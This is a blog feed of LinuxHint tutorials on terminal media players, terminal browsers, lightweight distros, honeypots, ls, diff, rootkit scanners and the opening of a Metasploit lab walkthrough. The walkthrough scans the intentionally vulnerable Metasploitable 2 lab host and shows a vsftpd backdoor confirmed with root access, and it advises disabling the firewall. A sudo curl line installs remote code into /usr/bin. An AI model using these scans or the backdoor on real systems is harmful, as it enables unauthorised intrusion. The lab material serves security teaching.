Ivan Vanney – Linux Hint https://linuxhint.com Exploring and Master Linux Ecosystem Thu, 24 Dec 2020 03:12:23 +0000 en-US hourly 1 https://wordpress.org/?v=5.6.2 Playing media in Linux terminal https://linuxhint.com/play_media_linux_terminal/ Sat, 22 Feb 2020 13:27:42 +0000 https://linuxhint.com/?p=55503 In many scenarios we may need to play media from the terminal. This can be achieved with Mplayer and mpv, two great media players for Linux terminal, this tutorial focuses on them.NOTE: It is important to highlight a bug that prevents several terminal media players from playing as root users by default, for this tutorial, except for installations, please use unprivileged users. Another point to clarify is mplayer requires a lot of troubleshooting to play remote videos on websites secured with SSL. While this tutorial shows how to play media in Linux terminal locally for Mplayer and Mpv, with Mplayer I will show how to play videos on http websites, while with Mpv I will show how to play videos on https websites such as Youtube.To begin lets download mplayer by running:

# apt install mplayer

# mplayer What\ is\ Kubernetes.mp4

A new window will open showing the video (in this case the video “What is Kubernetes’ ‘ from LinuxHint’s Youtube channel.

With your keyboard arrows you can manage the video position and you can pause it with your Space key on the keyboard.

Playing remote media from websites from Linux terminal:

Now you’ll see how to play videos from websites in your Linux terminal. The first way using mplayer is almost obsolete and only allows playing videos without SSL certificates, later you’ll see how to play videos on secured websites. To continue we need to edit the mplayer configuration file in the user home we are playing with. With nano or any text editor edit the file located at <YourHome>/.mplayer/config

In my case:

# nano /home/linuxhint/.mplayer/config

Within the configuration file add the line:


lirc=no

As shown below:

Press CTRL+X and Y to save and exit.

Now we can test it:

# mplayer http://www.aemet.es/documentos_d/eltiempo/prediccion/
videos/202002121902_videoeltiempoAEMET.mp4

And the video shows up.

Another terminal media player is mpv which is based on mplayer, to install it on the terminal run:

# apt install mpv -y

Once installed to play a video just run:

# mpv <Video-Name>

In this case:

# mpv What\ is\ Kubernetes.mp4

To play remote media files, for example for Youtube we need a workaround first, on the terminal run:

#  sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/bin/youtube-dl

# mpv https://www.youtube.com/watch?v=Bxxa5UQ6Ma4

Playing remote videos from a specific timestamp is also possible with Mpv using the following syntax:

# mpv --start=05:00 https://www.youtube.com/watch?v=IMOZCDhH7do

The command above will play the specified video form the minute 5. You can edit the start time by editing the –start=05:00 option.

Additional tips:

By pressing the key f, you can make the video Full screen, you can restore the default size by pressing the f again or ESC, these options are the same for Mplayer. By pressing Ctrl + and Ctrl – you can increase and decrease the audio speed, it is useful when the audio and video speed don’t match. With keys r and t you can change the subtitles position.

You can find more options for MPV player at its man page or online at https://manpages.debian.org/jessie/mpv/mpv.1. For Mplayer options you also see https://linux.die.net/man/1/mplayer.

Additional terminal media players:

Another option to play media from the Linux console is mpg123, You can install it by running:

# apt install mpg123 -y

There are also exclusive music players, without support for videos such as Music Player Daemon.

Conclusion:

Playing videos from terminal is a good solution, yet the default program configurations fail to play most popular video websites such as Youtube, all users from all OS, Windows, MacOS and Linux, for which the mentioned programs are available, report difficulties with customized solutions to achieve terminal remote playing. For ssh sessions the best option remains to copy the media files into the local device to play.

For remote playing videos, troubleshooting process includes editing the /etc/.config/mpv/mpv.conf with “no-ytdl”, if necessary you will need to create mpv’s configuration file. In other cases the no-ydl will need to be disabled to play, this option is used to bypass the  built-in ytdl_hook.lua file which sometimes brings problems. You may also need to downgrade your ytdl, you can achieve it by running “sudo pip install youtube_dl==2017.07.30.1”.

Vlc Player, despite isn’t a terminal video player, remains the best option for remote media playing, if you need help with VLC LinuxHint has 2 clear articles for you to read at https://linuxhint.com/install-vlc-media-player-2-2-x-linux/ and https://linuxhint.com/vlc-media-player-for-linux/.

I hope you found this tutorial on Playing media in Linux terminal useful. Keep following LinuxHint for more tips and updates.

]]>
Browsing the web from the Linux terminal https://linuxhint.com/browse_web_linux_terminal/ Sat, 22 Feb 2020 13:00:52 +0000 https://linuxhint.com/?p=55481 In some scenarios, you may want to browse websites from your Linux terminal. An example of these scenarios are when you have not an X-Window manager available or if you don’t have a good internet connection. When using 3G/4G or slow connections browsing websites from the terminal is a great option to increase speed and save bandwidth. This tutorial shows 4 terminal browsers: lynx, links, links2 and elinks.

Browsing the web from Linux terminal with lynx:

Let’s begin with the lynx console web browser, it is important to clarify this is the only terminal web browser in this article which doesn’t support mouse integration.

To begin installing the terminal web browser lynx, on Debian and based Linux distributions run:

# apt install lynx -y

Once installed using lynx is pretty easy, just call the program and specify the website you want to browse by running:

# lynx linuxhint.com

Despite lynx being simple, it isn’t as intuitive as it seems, instead of using the arrow keys from your keyboard to move from one place to other, use the SPACE key on your keyboard to move down and the B key to move up. When you reach the section, you want to browse into, just press ENTER.

If you want to go back to the previous page you can press your left arrow key on your keyboard, to go forward press the right arrow key on the keyboard.

By pressing the M key, you can go to the website homepage, a confirmation will be requested as shown in the screenshot below:

You can get more usage tips on lynx online at https://linux.die.net/man/1/lynx.

Browsing the web from Linux terminal with links:

Links is another great option to browse the web from the terminal, and it supports mouse integration.

To begin installing links terminal web browser on the terminal run:

# apt install links -y

Like with lynx and the rest of terminal web browsers call the program specifying the destination website with the following syntax:

# links linuxhint.com

The site will show up with a Welcome screen from links, press ENTER to close the welcome screen and get the website:

Press ENTER to OK and the website will show up:

As said previously, links supports mouse integration, if present, and you can use it to click on any section of the website you can to visit. As with Lynx, you can use the left arrow and right arrow keys on your keyboard to move a page back or a page forward.

By pressing the ESC key, you can display the main menu shown on the top of the screenshot below:

This main menu includes:

File: this menu includes the options go back, go forward, history, reload, bookmarks, new window, save as, save url as, save formatted document and kill background or all connections and flush the cache.

View: 
this submenu includes the options search, search backward, find next, find previous, toggle html/plain, document info, header info, frame at full-screen, save clipboard to a file, load clipboard from a file, html options and save html options.

Link: this submenu includes options follow link enter, open in new window and download link.

Downloads: here you are able to see the downloaded and downloading files.Setup:  here you are able to specify language, terminal options, margins, cache, options associated with mail and telnet, blocked images and additional options.

Help: this is the help submenu.

For links web browser you can visit https://linux.die.net/man/1/links.

Browsing the web from Linux terminal with links2:

As done with previous web browsers to install links2 on Debian based Linux distributions run:

# apt install links2

Then, once installed, on the terminal call the program specifying the website:

# links2 linuxhint.com

Then the shite will show up:

Like its predecessor links, links2 also supports mouse integration and the use of keys are the same for links and links2 including the ESC key to display the main menu bar.

There are more options available for links you can read at its man page: https://linux.die.net/man/1/links2.

Browsing the web from Linux terminal with Elinks:

Elinks is the last web browser of this article, to install it on the console run:

# apt install elinks -y

Then run it specifying the website as shown below:

# elinks linuxhint.com

Like with links and elinks, you can display a similar main menu on elinks by pressing the ESC key.

Elinks usage is similar, you can use the left and right keys on your keyboard to go back and forward, press ENTER on the item you can enter. Also elinks supports mouse integration like links and links2.

For elinks execution options visit: https://linux.die.net/man/1/elinks

I hope you found this tutorial on Browsing the web from Linux terminal useful. Keep following LinuxHint for more tips and updates.

]]>
Linux distributions for low resources computers https://linuxhint.com/linux_distributions_distros_low_resource_computers/ Sat, 22 Feb 2020 12:42:35 +0000 https://linuxhint.com/?p=55461 The present review on Linux distributions for low resources computers isn’t oriented to Linux users only, but to anyone with an old hardware PC with possibilities to be recycled. This includes regular Windows users who have not this possibility with OS offered by modern Windows OS, without Linux distributions oriented to low resources devices Windows users could only install old, outdated and unsafe Windows versions such as XP with a lot of compatibility issues with modern software and hardware.If Linux is a great, and maybe the best option for everyone, Linux distributions for low resources devices seems to be the only well-supported option for old computers.

This article briefly describes Puppy Linux, Lubuntu, LXLE, AntiX Linux and SparkyLinux.

Puppy Linux distribution for low resource computers:

Puppy Linux is a minimalist Linux distribution oriented to low resource devices. Contrary to the rest of Linux distributions mentioned in this article, Puppy Linux isn’t based on a specific Linux distribution only (once it was based on Vector Linux but not today), it uses packages compatible with different distributions ranging from Ubuntu to Slackware.

The minimum RAM memory required by Puppy Linux is 250 mb and 900 MHz processor and the whole OS can be contained on a 600 MB cd or small pendrive.

You can download Puppy Linux distribution from http://puppylinux.com/index.html#download.

Lubuntu Linux distribution for low resource computers:

Lubuntu Linux is a Ubuntu based Linux distribution oriented for low resources devices.
First Lubuntu hardware requirements are low and similar to those of Windows XP compatible with Pentium 2 and Pentium 3 processors with a minimal of 512 mb ram requirement, these old versions were also available for PowerPc computers. Recent versions are compatible with pentium 4 and no longer support PowerPc, of course, despite being oriented to low resource devices it can be used on potent computers too. Instead of bringing Gnome by default like Ubuntu Linux, Lubuntu uses LXQt desktop environment which is compatible with low resource devices and is already translated into many languages. This desktop environment is also optionally used by Debian, Manjaro, Fedora, OpenSUSE among other Linux distributions. 2 years after its initial launch Lubuntu was recognized by Ubuntu as an official Ubuntu version.

You can get Lubuntu at https://lubuntu.me/downloads/.

LXLE Linux distribution for low resource computers:

It is a Linux Distribution based on the previously mentioned Lubuntu distribution.
Contrary to Lubuntu, and despite being a great option for low resource devices, Lubuntu keeps being more user friendly, on LXLE some repositories may trend to be unavailable and for foreigner users who don’t like English as main language translations are not completed. Yet it is a lot faster than regular Ubuntu, compatible with Pentium 3 processor and can be installed on hard disks with less than 10 GB with great performance.

Like any low resources Linux oriented distribution LXLE brings optimized software for that purposes such as the lightweight SeaMonkey web browser based on Mozilla Firefox or AbiWord and Gnumeric instead of LibreOffice. Despite being based on a modern Ubuntu, LXLE keeps the Kernel 4 by default.
You can download LXLE from https://lxle.net/download/.

AntiX Linux distribution for low resource computers:

Contrary to Lubuntu and LXLE, AntiX Linux is a low resources oriented computers distribution based on Debian. It is even lighter than the previous distributions mentioned in this article, compatible with 256 mb ram and requires a minimum of 4 GB on the hard disk to be installed and like Lubuntu it is also compatible with modern devices.
AntiX Linux offers 3 versions, the Full version which includes widely used applications by default, the Base version with customized applications installation and the Core-libre version which fully customizes the installation, the Full version even includes Synaptic.

You can get AntiX Linux distribution at https://antixlinux.com/download/.

SparkyLinux distribution for low resource computers:

SparkyLinux is based on Debian and uses LXDE as default desktop environment with around 20 additional optional desktop environments the user can set.
It brings a version for gamers, another for multimedia professionals and one for technicians or users who need to fix any OS which can’t boot.
Additionally there is a more minimalist version without X server.

You can get SparkyLinux at https://sparkylinux.org/download/.

Conclusion:

Except for Puppy Linux releases based on Slackware Linux all distributions mentioned in this article are user friendly and among the best options to recycle old computers while getting a high performance without losing modernity and security.

These distributions are also a good option if you need to virtualize an OS without taking considerable resources from the host computer while avoiding to loss performance on the guest side.

I hope you found this article on Linux distributions for low resources computers useful. Keep following LinuxHint for more tips and updates.

]]>
Honeypots and Honeynets https://linuxhint.com/honeypots_honeynets/ Fri, 21 Feb 2020 10:16:57 +0000 https://linuxhint.com/?p=55391 Part of the work of security IT specialists is to learn about the types of attacks, or techniques used by hackers by collecting, also, information for later analysis in order to evaluate the attack attempts characteristics. Sometimes this collection of information is done through a bait, or decoys designed to register suspicious activity of potential attackers who act without knowing their activity is being monitored. In IT security these baits or decoys are called Honeypots.

A honeypot may be an application simulating a target which is really a recorder of attackers’ activity. Multiple Honeypots simulating multiple services, devices and applications related are denominated Honeynets.

Honeypots and Honeynets don’t store sensitive information but store fake attractive information to attackers in order to get them interested in the Honeypots, Honeynets, in other words we are talking about hacker traps designed to learn their attack techniques.

Honeypots report us two types of benefits: first they help us to learn attacks to later secure our production device or network properly. Second, by keeping honeypots simulating vulnerabilities next to production devices or network, we keep hackers attention out of secured devices, since they will find more attractive the honeypots simulating security holes they can exploit.

There are different types of Honeypots:

Production Honeypots:

This type of honeypots is installed in a production network to collect information on techniques used to attack systems within the infrastructure.  This type of Honeypots offers a wide variety of possibilities, from the location of the honeypot within a specific network segment in order to detect internal attempts by network legitimate users to access unallowed or forbidden resources to a clone of a website or service, identical to the original as bait. The biggest issue of this type of honeypots is allowing malicious traffic between legitimate one.

Development honeypots:

This type of honeypots is designed to collect more information as possible on hacking trends, desired targets by attackers and attacks origins. This information is later analyzed for the decision-making process on security measures implementation.

The main advantage of this type of honeypots is, contrary to production honeypots development honeypots are located within an independent network, dedicated for research, this vulnerable system is separated from the production environment preventing an attack from the honeypot itself. Its main disadvantage is the quantity of resources necessary to implement it.

There is a 3 subcategory or different classification of honeypots defined by the interaction it has with attackers.

Low Interaction Honeypots:

A Honeypot emulates a vulnerable service, app or system.  This is very easy to setup but limited when collecting information, some examples of this type of honeypots are:

Honeytrap: it is designed to observe attacks against network services, contrary to other honeypots which focus on capturing malwares this type of honeypots is designed to capture exploits.

Nephentes: emulates known vulnerabilities in order to collect information on possible attacks, it is designed to emulate vulnerabilities worms exploits to propagate, then Nephentes captures their code for later analysis.

HoneyC: identifies malicious web servers within the networking by emulating different clients and collecting server responses when replying to requests.

HoneyD: is a daemon which creates virtual hosts within a network which can be configured to run arbitrary services simulating execution in different OS.

Glastopf: emulates thousands of vulnerabilities designed to collect attacks information against web applications. It is easy to setup and once indexed by search engines it becomes an attractive target to hackers.

Medium Interaction Honeypots:

These types of honeypots are less interactive than the previous without allowing the level interaction high honeypots allow. Some Honeypots of this type are:

Kippo: it is a ssh honeypot used to log brute force attacks against unix systems and log the activity of the hacker if the access was gained. It was discontinued and replaced by Cowrie.

Cowrie: another ssh and telnet honeypot which logs brute force attacks and hackers shell interaction. It emulates a Unix OS and works as proxy to log the attacker activity.

Sticky_elephant: it is a PostgreSQL honeypot.

Hornet: An improved version of honeypot-wasp with fake credentials prompt designed for websites with public access login page for administrators such as /wp-admin for wordpress sites. 

High Interaction Honeypots:

In this scenario Honeypots aren’t designed to collect information only, it is an application designed to interact with attackers while exhaustively registering the interaction activity, it simulates a target capable of offering all answers the attacker may expect, some honeypots of this type are:

Sebek: works in as a HIDS (Host-based Intrusion Detection System) allowing to capture information on a system activity. This is a server-client tool capable to deploy honeypots on Linux, Unix and Windows which capture and send the collected information to the server.

HoneyBow: can be integrated with low interaction honeypots to increase information collection.

HI-HAT (High Interaction Honeypot Analysis Toolkit): converts php files into high interaction honeypots with a web interface available to monitor the information.

Capture-HPC: similar to HoneyC, identifies malicious servers by interacting with them as clients using a dedicated virtual machine and registering unauthorized changes.

If you are interested in Honeypots probably IDS (Intrusion Detection Systems) may be interesting for you, at LinuxHint we have a couple of interesting tutorials about them:

I hope you found this article on Honeypots and Honeynets useful. Keep following LinuxHint for more tips and updates on Linux and security.

]]>
How to List Files Ordered by Size in Linux https://linuxhint.com/list_files_ordered_by_size/ Fri, 21 Feb 2020 10:07:30 +0000 https://linuxhint.com/?p=55412 The present article briefly explains how to list or display files and directories ordered by size. This can be easily achieved with the command ls (list). Before sorting the files, in order to explain each option applied let’s do a long listing which will print file sizes, among more information, without sorting it (in the second screenshot I explain how to sort), this is achieved by adding the -l (lowercase -l for long listing) as shown below:

# ls -l

The first line displays the entire size of the directory you are listing files in. When adding the -l option the output will display file permissions in the first column, the hard links, the owner, the group, the size in bytes, month, day and time and finally the filename.

If you want to sort this output according to file size, from bigger to smaller you need to add the -S (Sort) option.

# ls -lS

As you can see the output lists the files and directories sorted by size, but in bytes which is not very human friendly (1 Byte is 0.000001 MB in decimal and 0.00000095367432 MB in binary).

To print the output in a human friendly way you only need to add the -h (human friendly) option:

# ls -lSh

As you can see in the output above, now file sizes are shown in GB, MB, KB and Bytes.
Yet you are only seeing regular files without hidden files, if you want to include hidden files in the output you need to add the option -a (all) as shown below:

# ls -lSha

As you can see hidden files (starting with a dot) are printed too now.

Additional tips:

The following additional tips will help you to limit the output to a specific unit size different than bytes. The problem of this option is the output is never exact when the file is smaller or bigger than an exact number of that unit.

If you want to print in a specific size unit only instructing ls to display all files with the closest size in that unit only you can achieve it, for example, to print all files in MB you can add –block-size= options specifying MB with M as shown in the syntax and screenshot below:

# ls -lS --block-size=M

As you can see now the size is in MB only, the bigger file is 115 MB, the second 69 MB, etc. Files with KB or Bytes size won’t be printed accurately, they will be shown as 1 MB which is the closest size can be printed if limited to MB.
The rest of the output remains exactly the same.

Using the same option (–block-size=) you can display the output in GB size instead of MB or bytes, the syntaxis is the same, replace the M for a G as in the example below:

# ls -lS --block-size=G

You can also print the size in KB units by replacing the M or G for a K:

# ls -lS --block-size=K

All the examples above will list files and directories sorted by size in the unit you want, with the clarified problem mentioned above the output wont be accurate for files which don’t match a exact unit size. Additionally, these examples didn’t include hidden files (which start with a .). To do so, you will need to add the option -a (all) which will display hidden files too, therefore, to print files sorted by size by bytes run:

# ls -laS

As you can see now hidden files, starting with a . (dot) are printed, such as .xsession-errors, .ICEauthority, etc.

If you want to print files and directories sorted by size in MB including hidden files run:

# ls -laS --block-size=M

To print or display all files and directories sorted by size shown in GB including hidden files run:

# ls -laS --block-size=G

Similarly to previous commands, to print files and directories ordered by size shown in KB including hidden files run:

# ls -laS --block-size=K

Conclusion:

The command ls brings a lot of functionalities which help us to manage files and print information on them. Another example could be the use of ls to list files by date (with -lt options).

I hope you found this tutorial on How to list all files ordered by size in Linux useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
diff Command Examples in Linux https://linuxhint.com/diff_command_examples/ Wed, 19 Feb 2020 05:46:18 +0000 https://linuxhint.com/?p=55316 The diff command is an analysis or informative command which prints differences between files, analyzing them line by line, or directories recursively while informing the user what changes are necessary to make files equals, this point is important to understand diff outputs. This tutorial focuses on the diff command.

Before starting, create two files using any text editor (nano is used in this tutorial) with the same content:

# nano diffsample1

Inside paste:


LinuxHint publishes
the best
content for you

Press CTRL+X and Y to save and exit.

Create a second file called diffsample2 with the same content:

# nano diffsample2

Note: pay attention to spaces and tabs, files must be 100% equal.

Press CTRL+X and Y to save and exit.

# diff diffsample1 diffsample2

As you can see there is no output, no need to do something to make files equal because they are already equal.

Now lets edit the file diffsample2 to make some change:

# nano diffsample2

Then let’s replace the word “content” for “tips”:

Press CTRL+X and Y to save and exit.

Now run:

# diff diffsample1 diffsample2

Lets see the output:

The output above, “3c3” means “Line 3 of first file of should be replaced for line 3 of second file”. The friendly part of the output is it shows us what text must be changed (“content for you” for “tips for you”)

This shows us the reference for the command diff isn’t the first file but the second one, that’s why the first file third line (the first 3) must be changed (C) as the third line of the second file (second 3).

The command diff can show 3 characters:

c: this character instructs a Change must be done.
a: this character instructs something must be Added.
d: this character instructs something must be Deleted.

The first numbers before a characters belong to the first file, while the numbers after characters belong to the second file.

The symbol < belongs to the first file and the symbol > to the second file which is used as reference.

Let’s invert the files order, instead of running

# diff diffsample1 diffsample2

run:

# diff diffsample2 diffsample1

You can see how the order was inverted and now the diffsample1 file is used as reference, and it instructs us to change “tips for you” for “content for you”, this was the previous output:

Now let’s edit the file diffsample1 like this:

Remove all lines,except for the first line on the file diffsample1. Then run:

# diff diffsample2 diffsample1

As you can see, since we used the file diffsample1 as reference, in order to make the file diffsample2 exactly equal we need to delete (d) lines two and three (2,3) like in the first file and first lines (1) will be equal.

Now lets invert the order and instead of running “# diff diffsample2 diffsample1” run:

# diff diffsample1 diffsample2

As you can see, while the previous example instructed us to remove, this one instructs us  to add (a) lines 2 and 3 after the first file first line (1).

Now let’s work on the case sensitive property of this program.

Edit the file diffsample2 like:

And edit the file diffsample1 as:

The only difference are the capital letters on the file diffsample2. Now lets compare it using diff again:

# diff diffsample1 diffsample2

As you can see diff found differences, the capital letters, we avoid diff detecting capital letters, if we aren’t interested in the case sensitive by adding the -i option:

# diff -i diffsample1 diffsample2

No differences were found, the case detection was disabled.

Now let’s change the output format by adding the option -u used to print unified outputs:

Additionally, to date and time, the output shows with a and + symbol what should be removed and what should be added in order to make files equal.

At the start of this article I said spaces and tabs must be equal in both files, since they are also detected by the command diff, if we want the command diff to ignore spaces and tabs we need to apply the -w option.

Open the file diffsample2 and add spaces and tabs:

As you see I added a couple of tabs after “the best” in the second line and also spaces in all lines, close,save the file and run:

# diff diffsample1 diffsample2

As you can see differences were found, additionally to the capital letters. Now lets apply the option  -w to instruct diff to ignore blank spaces:

As you see despite the tabulation diff only found as difference the capital letters.
Now let’s add the option -i again:

#diff  -wi diffsample2 diffsample1

The command diff has dozens of available options to apply to ignore, change the output, discriminate columns when present, etc. You can get additional information on these options using the man command, or at http://man7.org/linux/man-pages/man1/diff.1.html. I hope you found this article with diff Command Examples in Linux useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to Install Chkrootkit https://linuxhint.com/install_chkrootkit/ Wed, 12 Feb 2020 19:08:20 +0000 https://linuxhint.com/?p=55066 This tutorial focuses on rootkits and how to detect them using chkrootkit. Rootkits are tools designed to grant access or privileges while hiding their own presence, or the presence of an additional software granting the access, the “rootkit” term focuses on hiding aspect. To achieve hiding a malicious software rootkit manage to integrate into the target’s kernel, software or in the worst case within hardware firmware.

Usually, when detected the presence of a rootkit the victim needs to reinstall the OS and fresh hardware, analyze files to be transferred to the replacement and in the worst-case hardware replacement will be needed.It is important to highlight the possibility of false positives, this is the main problem of chkrootkit, therefore when a threat is detected the recommendation is to run additional alternatives before taking measures, this tutorial will also briefly explore rkhunter as an alternative. It is also important to say this tutorial is optimized for Debian and based Linux distributions users, the only limitation for other distributions users is the installation part, the usage of chkrootkit is the same for all distros.

Since rootkits have a variety of ways to achieve its goals hiding malicious software, Chkrootkit offers a variety of tools to afford these ways. Chkrootkit is a tools suite which include the main chkrootkit program and additional libraries which are listed below:

chkrootkit: Main program which checks operating system binaries for rootkit modifications to learn if the code was adulterated.

ifpromisc.c: checks if the interface is in promiscuous mode. If a network interface is in promiscuous mode, it can be used by an attacker or malicious software to capture the network traffic to later analyze it.

chklastlog.c: checks for lastlog deletions. Lastlog is a command which shows information on last logins. An attacker or rootkit may modify the file to avoid detection if the sysadmin checks this command to learn information on logins.

chkwtmp.c: checks for wtmp deletions. Similarly, to the previous script, chkwtmp checks the file wtmp, which contains information on users’ logins to try to detect modifications on it in case a rootkit modified the entries to prevent detection of intrusions.

check_wtmpx.c: This script is the same as the above but Solaris systems.
chkproc.c: checks for signs of trojans within LKM (Loadable Kernel Modules).
chkdirs.c: has the same function as the above, checks for trojans within kernel modules.
strings.c: quick and dirty strings replacement aiming to hide the nature of the rootkit.
chkutmp.c: this is similar to chkwtmp but checks the utmp file instead.

All the scripts mentioned above are executed when we run chkrootkit.

To begin installing chkrootkit on Debian and based Linux distributions run:

# apt install chkrootkit -y

Once installed to run it execute:

# sudo chkrootkit

During the process you can see all scripts integrating chkrootkit are executed doing each its part.

You can get a more comfortable view with scrolling  adding  pipe and less:

# sudo chkrootkit | less

You can also export the results to a file using the following syntax:

# sudo chkrootkit > results

Then to see the output type:

# less results

Note: you can replace “results” for any name you want to give the output file.

By default you need to run chkrootkit manually as explained above, yet you can define daily automatic scans by editing chkrootkit configuration file located at /etc/chkrootkit.conf, try it using nano or any text editor you like:

# nano /etc/chkrootkit.conf

To achieve daily automatic scan the first line containing RUN_DAILY=”false” should be edited to RUN_DAILY=”true”

This is how it should look:

Press CTRL+X and Y to save and exit.

Rootkit Hunter, an alternative to chkrootkit:

Another option to chkrootkit is RootKit Hunter,it is also a complement considering if you found rootkits using one of them, using the alternative is mandatory to discard false positives.

To begin with RootKitHunter, install it by running:

# apt install rkhunter -y

Once installed, to run a test execute the following command:

# rkhunter --check

As you can see, like chkrootkit the first step of RkHunter is to analyze the system binaries, but also libraries and strings:

As you will see, contrary to chkrootkit RkHunter will request you to press ENTER to continue with next steps, previously RootKit Hunter checked the system binaries and libraries, now it will go for known rootkits:

Press ENTER to let RkHunter to go ahead with rootkits search:

Then, like chkrootkit it will check your network interfaces and also ports known for being used by backdoors or trojans:

Finally it will print a summary of the results.

You can always access results saved at /var/log/rkhunter.log:

If you suspect your device may be infected by a rootkit or compromised you can follow the recommendations listed at https://linuxhint.com/detect_linux_system_hacked/.

I hope you found this tutorial on How to install, configure and use chkrootkit useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
10 Metasploit usage examples https://linuxhint.com/metasploit_usage_examples/ Wed, 12 Feb 2020 19:04:40 +0000 https://linuxhint.com/?p=55084 Metasploit is a security framework that comes with many tools for system exploit and testing. This tutorial shows 10 examples of hacking attacks against a Linux target. The Linux target is a training environment Metasploitable 2 OS, intentionally vulnerable for users to learn how to exploit its vulnerabilities. This tutorial only focuses on 10 specific metasploit attacks, for information on Metasploitable 2 installation read more here.To begin download Metasploit.

In my case I have downloaded Metasploit Pro Free trial, but you can get any of them.
The following screen will require some of your personal information, fill it to pass to the download page:

Download Metasploit for Linux:

Give the installer you just downloaded execution rights by running:

# chmod +x metasploit-latest-linux-x64-installer.run

Then execute Metasploit by running:

# ./metasploit-latest-linux-x64-installer.run

As you see an installer GUI prompts, click on Forward to continue:

In the next screen accept the license agreement and click on Forward:

Leave the default directory and press Forward:

When asked if to install Metasploit as service the recommendation is not, if you do, metasploit service will start every time you boot, if you press No Metasploit service will be launched only upon your request. Select your choice and press on Forward to continue:

In order to avoid interferences, when using Metasploit turn off your firewall, press Forward to continue:

Unless the shown port is already used, press Forward to continue:

Leave localhost and press Forward to continue:

Then to proceed with the installation press Forward for last time:

The installation process will begin:

Finally, Metasploit was installed, despite the fact that we are not going to work with the Metasploit web interface you can mark it to keep it available. Press Finish to end.

Troubleshooting Metasploit DB error:

In my case when I launched Metasploit it returned the error:



No database support: could not connect to server: Connection refused Is the server running
on host "localhost" (::1) and accepting TCP/IP connections on port 7337?

The reason for this error is the dependency PostgreSQL wasn’t installed and metasploit service either.

To solve it run:

# apt install -y postgresql

Then start PostgreSQL by running:

# sudo service postgresql start

And finally start Metasploit service:

# sudo service metasploit start

Now run msfconsole again and you’ll notice the error disappeared and we are ready to attack Metasploitable 2:

Using Metasploit to scan a target for vulnerabilities:

The first step is to scan our target to discover services and vulnerabilities on it. In order to achieve it we will use Nmap from Metasploit and its NSE (Nmap Scripting Engine) vuln script used to detect vulnerabilities:

# db_nmap -v --script vuln 192.168.0.184

NOTE: replace 192.168.0.184 for your target IP address or host.

Let’s analyze Nmap’s output:

IMPORTANT: Nmap output contained over 4000 lines, therefore the output was shortened leaving relevant information to be explained.

The following lines just shows us the initialized types of scans which involve NSE, ARP Ping Scan, DNS resolution and a SYN Stealth Scan. All these steps were already clearly explained at linuxhint.com at Nping and Nmap arp scan, Using nmap scripts and Nmap Stealth Scan.

Note that NSE contains pre-execution, during scan execution and post-execution scripts which run before, during and after the scan process starts and ends.


msf5 > db_nmap -v --script vuln 192.168.0.184
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-04 16:56 -03
[*] Nmap: NSE: Loaded 103 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 16:56
[*] Nmap: Completed NSE at 16:57, 10.00s elapsed
[*] Nmap: Initiating NSE at 16:57
[*] Nmap: Completed NSE at 16:57, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 16:57
[*] Nmap: Scanning 192.168.0.184 [1 port]
[*] Nmap: Completed ARP Ping Scan at 16:57, 0.05s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 16:57
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 16:57, 0.02s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 16:57
[*] Nmap: Scanning 192.168.0.184 [1000 ports]

The next extract shows what services are available at our target:


[*] Nmap: Discovered open port 25/tcp on 192.168.0.184
[*] Nmap: Discovered open port 80/tcp on 192.168.0.184
[*] Nmap: Discovered open port 445/tcp on 192.168.0.184
[*] Nmap: Discovered open port 139/tcp on 192.168.0.184
[*] Nmap: Discovered open port 3306/tcp on 192.168.0.184
[*] Nmap: Discovered open port 5900/tcp on 192.168.0.184
[*] Nmap: Discovered open port 22/tcp on 192.168.0.184
[*] Nmap: Discovered open port 53/tcp on 192.168.0.184
[*] Nmap: Discovered open port 111/tcp on 192.168.0.184
[*] Nmap: Discovered open port 21/tcp on 192.168.0.184
[*] Nmap: Discovered open port 23/tcp on 192.168.0.184
[*] Nmap: Discovered open port 1099/tcp on 192.168.0.184
[*] Nmap: Discovered open port 512/tcp on 192.168.0.184
[*] Nmap: Discovered open port 1524/tcp on 192.168.0.184
[*] Nmap: Discovered open port 513/tcp on 192.168.0.184
[*] Nmap: Discovered open port 514/tcp on 192.168.0.184
[*] Nmap: Discovered open port 2121/tcp on 192.168.0.184
[*] Nmap: Discovered open port 6000/tcp on 192.168.0.184
[*] Nmap: Discovered open port 2049/tcp on 192.168.0.184
[*] Nmap: Discovered open port 6667/tcp on 192.168.0.184
[*] Nmap: Discovered open port 8009/tcp on 192.168.0.184
[*] Nmap: Discovered open port 5432/tcp on 192.168.0.184
[*] Nmap: Discovered open port 8180/tcp on 192.168.0.184
[*] Nmap: Completed SYN Stealth Scan at 16:57, 0.12s elapsed (1000 total ports)

The following extract report NSE post scan scripts execution to find vulnerabilities:


[*] Nmap: NSE: Script scanning 192.168.0.184.
[*] Nmap: Initiating NSE at 16:57
[*] Nmap: Completed NSE at 17:02, 322.44s elapsed
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.74s elapsed
[*] Nmap: Nmap scan report for 192.168.0.184
[*] Nmap: Host is up (0.00075s latency).
[*] Nmap: Not shown: 977 closed ports

As you can see, Nmap already found security holes or vulnerabilities on the target FTP service, it even links us exploits to hack the target:


[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 21/tcp   open  ftp
[*] Nmap: | ftp-vsftpd-backdoor:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   vsFTPd version 2.3.4 backdoor
[*] Nmap: |     State: VULNERABLE (Exploitable)
[*] Nmap: |     IDs:  OSVDB:73573  CVE:CVE-2011-2523
[*] Nmap: |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
[*] Nmap: |     Disclosure date: 2011-07-03
[*] Nmap: |     Exploit results:
[*] Nmap: |       Shell command: id
[*] Nmap: |       Results: uid=0(root) gid=0(root)
[*] Nmap: |     References:
[*] Nmap: |       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
[*] Nmap: |       http://osvdb.org/73573
